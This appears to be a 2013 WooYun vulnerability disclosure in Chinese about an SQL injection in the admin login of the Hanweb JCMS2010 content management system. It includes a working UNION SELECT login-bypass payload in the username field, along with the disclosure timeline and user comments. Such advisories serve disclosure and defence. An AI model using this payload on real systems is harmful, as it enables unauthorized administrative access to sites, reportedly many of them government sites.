当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(10) 关注此漏洞

缺陷编号: WooYun-2013-37494

漏洞标题: 大汉版通JCMS内容管理系统SQL注射漏洞

相关厂商: 南京大汉网络有限公司

漏洞作者: 鶆鶈

提交时间: 2013-09-19 14:40

公开时间: 2013-12-15 14:41

漏洞类型: SQL注射漏洞

危害等级: 中

自评Rank: 10

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-09-19: 细节已通知厂商并且等待厂商处理中
2013-09-24: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2013-11-18: 细节向核心白帽子及相关领域专家公开
2013-11-28: 细节向普通白帽子公开
2013-12-08: 细节向实习白帽子公开
2013-12-15: 细节向公众公开

简要描述:

大汉版通JCMS内容管理系统某处参数未经处理即入库查询导致SQL注射漏洞产生,可利用来登录后台等,当前测试存在该漏洞的版本为JCMS2010。

详细说明:

1. 大汉版通JCMS内容管理系统(JCMS2010)默认后台登录页中由于用户名未经处理即带入数据库查询产生SQL注射漏洞。

2. 利用测试:

后台登录页:http://**.**.**.**/jcms/

用户名:x' union select '00000','admin','AEY=',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,'1',NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL from dual--

密码:1

其中'00000'是验证管理员用户组的一个字段;'admin'是管理员用户名;'AEY='加密密码,解密后为'1';后面的'1'表示帐号启用。

漏洞证明:

我不大清楚,别人说是这么回事,说厂家官网也存在这个漏洞:

hanweb.jpg

修复方案:

在代码中过滤用户名的'号?

至于甲方?让他们买WAF去吧...

版权声明:转载请注明来源 鶆鶈@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2013-12-15 14:41

厂商回复:

最新状态:

2013-09-24:感谢,正在修复。


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):
登陆后才能进行评分

评价

  1. 2013-09-19 01:26 | springold ( 路人 | Rank:14 漏洞数:2 | simple)
    1

    让用户催他们明天就来认领,这个系统的用户量太大,还都是政府。

  2. 2013-09-19 09:59 | 小七 ( 路人 | Rank:6 漏洞数:3 | 好好学习,天天向上)
    0

    呵呵,我是新手 来学习的。。。。

  3. 2013-09-27 01:54 | 鶆鶈 ( 普通白帽子 | Rank:319 漏洞数:31 )
    1

    华丽丽地给我忽略了,还是刷甲方去吧,乙方何苦为难乙方.

  4. 2013-10-11 17:10 | wefgod ( 核心白帽子 | Rank:1825 漏洞数:183 | 力不从心)
    1

    忽略时间:2013-09-24 14:41 厂商回复: 最新状态: 2013-09-24:感谢,正在修复。

  5. 2015-02-12 01:48 | Hancock 认证白帽子 ( 普通白帽子 | Rank:557 漏洞数:92 | ‮kcocnaH)
    0

    @鶆鶈 这个是什么加密方式呢?

登录后才能发表评论,请先 登录